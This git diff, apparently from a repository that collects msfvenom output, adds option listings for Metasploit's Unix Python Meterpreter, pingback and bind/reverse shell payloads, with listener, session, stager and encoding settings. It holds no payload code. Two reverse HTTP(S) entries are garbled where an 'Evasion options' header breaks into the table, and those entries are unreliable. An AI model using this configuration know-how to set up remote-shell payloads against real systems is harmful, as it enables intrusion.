no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies 
specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..52f12b9 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,67 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP Stager + Module: payload/cmd/unix/python/meterpreter/reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 514 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect 
attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt new file mode 100644 index 0000000..df56c4a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt 
@@ -0,0 +1,70 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager + Module: payload/cmd/unix/python/meterpreter/reverse_tcp_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 510 + Rank: Normal + +Provided by: + Spencer McIntyre + Ben Campbell + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Reverse Python connect back stager using SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..dc624f1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt 
@@ -0,0 +1,68 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support + Module: payload/cmd/unix/python/meterpreter/reverse_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 582 + Rank: Normal + +Provided by: + Spencer McIntyre + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Connect back to the attacker with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt new file mode 100644 index 0000000..c888fec --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt 
@@ -0,0 +1,54 @@ + + Name: Python Exec, Python Meterpreter Shell, Bind TCP Inline + Module: payload/cmd/unix/python/meterpreter_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24965 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect to the victim and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the 
payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt new file mode 100644 index 0000000..2aed131 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt 
@@ -0,0 +1,69 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse HTTP Inline + Module: payload/cmd/unix/python/meterpreter_reverse_http + Platform: Unix + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/unix/python/meterpreter_reverse_http: +========================= + +rent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + 
HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt new file mode 100644 index 0000000..937bfb8 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt 
@@ -0,0 +1,71 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline + Module: payload/cmd/unix/python/meterpreter_reverse_https + Platform: Unix + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/unix/python/meterpreter_reverse_https: +========================= + +ent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + 
HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..39a61ac --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,61 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse TCP Inline + Module: payload/cmd/unix/python/meterpreter_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24942 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The 
displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt new file mode 100644 index 0000000..959642a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-pingback_bind_tcp.txt 
@@ -0,0 +1,32 @@ + + Name: Python Exec, Python Pingback, Bind TCP (via python) + Module: payload/cmd/unix/python/pingback_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 484 + Rank: Normal + +Provided by: + Spencer McIntyre + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Listens for a connection from the attacker, sends a UUID, then terminates + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt new file mode 100644 index 0000000..e5aecf8 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-pingback_reverse_tcp.txt 
@@ -0,0 +1,39 @@ + + Name: Python Exec, Python Pingback, Reverse TCP (via python) + Module: payload/cmd/unix/python/pingback_reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 421 + Rank: Normal + +Provided by: + Spencer McIntyre + asoto-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connects back to the attacker, sends a UUID, then terminates + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt new file mode 100644 index 0000000..c1e6a23 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-shell_bind_tcp.txt 
